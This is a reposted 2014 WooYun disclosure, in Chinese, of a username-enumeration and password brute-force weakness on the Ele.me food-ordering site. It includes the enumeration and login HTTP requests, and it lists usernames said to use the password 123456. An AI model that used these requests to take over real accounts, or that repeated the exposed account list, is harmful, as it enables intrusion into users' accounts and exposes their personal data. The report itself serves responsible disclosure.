饿了么在线订餐平台账户密码可爆破

admin

139580
文章

114
评论

2015年4月24日18:32:17评论388 views字数 210阅读0分42秒阅读模式

摘要

2014-07-10：细节已通知厂商并且等待厂商处理中
2014-07-10：厂商已查看当前漏洞内容,细节仅向厂商公开
2014-07-15：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(1) 关注此漏洞

缺陷编号： WooYun-2014-67621

漏洞标题：饿了么在线订餐平台账户密码可爆破

漏洞作者：路人甲

提交时间： 2014-07-10 11:03

公开时间： 2014-07-15 11:04

漏洞类型：敏感信息泄露

危害等级：高

自评Rank： 15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：敏感信息泄露

0人收藏

漏洞详情

披露状态：

简要描述：

出门，见到处都是此公司的人在街上派单，挺辛苦，那么试试这热火的网络订餐吧
发现，，，，

详细说明：

http://ele.me/ 登录此网

点击注册，试了几个用户名都是已注册用户.....

那么按照此思路可试试N次得到些用户名，返回参数代表注册或未注册用户名，用此GET无限制。

code 区域

GET /api/checkUsername?sf_guard_user%5Busername%5D=wangxiaojian HTTP/1.1

继续。。。。

好吧，就这么多，浅尝则止了，已经很多用户名出现了。

漏洞证明：

有了大量的注册用户名，那么简单试一下登录吧，看看，有木有验证码？

没有？其实三次就有验证码了，但是形同虚设,,,,,,

拦截用以下注入

code 区域

POST /login HTTP/1.1
 Host: ele.me
 Connection: keep-alive
 Content-Length: 78
 Cache-Control: max-age=0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Origin: https://ele.me
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
 Content-Type: application/x-www-form-urlencoded
 Referer: https://ele.me/login
 Accept-Encoding: gzip,deflate,sdch
 Accept-Language: zh-CN,zh;q=0.8
 
 signin%5Busername%5D=wangxiaojian&signin%5Bpassword%5D=111111&signin%5Bremember%5D=on

密码错了，就refresh到登录页

密码对了，就到https://ele.me

好了，注入开始，用一些常用的弱口令注入尝试

为证明问题是跑了一会，就停了，已经达到好几位数了。

尝试下登录看看随机找几个用户：

积分出现了，可以兑换

手机电话，住址.....

邮箱，有些就是qq号了

而且，此处设计上，可以发送任意邮箱绑定别人的邮箱。。。绑定新手机也是一样，不用验证原手机？那么是不是积分高可兑换礼品的用户，被破了，账户这样被别人绑走了...

还有，找回密码功能，只用邮箱？不可以用手机？更换手机，在订单中明文显示手机号了，可以绕过，绑定新手机。

好吧扯远了...

为证明问题：给出一些用户名吧。密码123456 其余太多不展示了。

code 区域

wangxian 
 baicai 
 chaobao
 pengjun 
 pengqun 
 pengsheng 
 pengxia 
 pengying 
 pixuan 
 piaoyi 
 pinseng 
 pingdan 
 pingfa 
 pingge 
 pingyu 
 pingzhou 
 qianliu 
 pingdan 
 beiwaipengdan 
 pengjia 
 qianran
 puqian 
 puzhen 
 qibing 
 qiancong 
 qianlei

修复方案：

登录加“真正”的验证码限制请求的次数。

还有办法，其实你们的攻城狮比我专业。。。

code 区域

无恶意，只希望贵公司能对产品修改优化,平台越走越远。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-07-15 11:04

厂商回复：

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

100%

评价

2015-03-23 11:43 | smarttang ( 路人 | 还没有发布任何漏洞 | 乌云两个帐号都是我的... t.qq.com/mojige...)

0

呵呵！没有影响忽略？

1# 回复此人
2015-08-29 22:05 | 闪了 ( 路人 | Rank:6 漏洞数:6 | 微博被封准备新开初来乍到多多指教)

0

@smarttang 哈哈

2# 回复此人

漏洞概要 关注数(1) 关注此漏洞

缺陷编号： WooYun-2014-67621

漏洞标题： 饿了么在线订餐平台账户密码可爆破

相关厂商： 饿了么

漏洞作者： 路人甲

提交时间： 2014-07-10 11:03

公开时间： 2014-07-15 11:04

漏洞类型： 敏感信息泄露

危害等级： 高

自评Rank： 15

漏洞状态： 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 敏感信息泄露

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(少于3人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(1) 关注此漏洞

漏洞标题：饿了么在线订餐平台账户密码可爆破

相关厂商：饿了么

漏洞作者：路人甲

漏洞类型：敏感信息泄露

危害等级：高

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签：敏感信息泄露

版权声明：转载请注明来源路人甲@乌云

漏洞评价(少于3人评价):

登陆后才能进行评分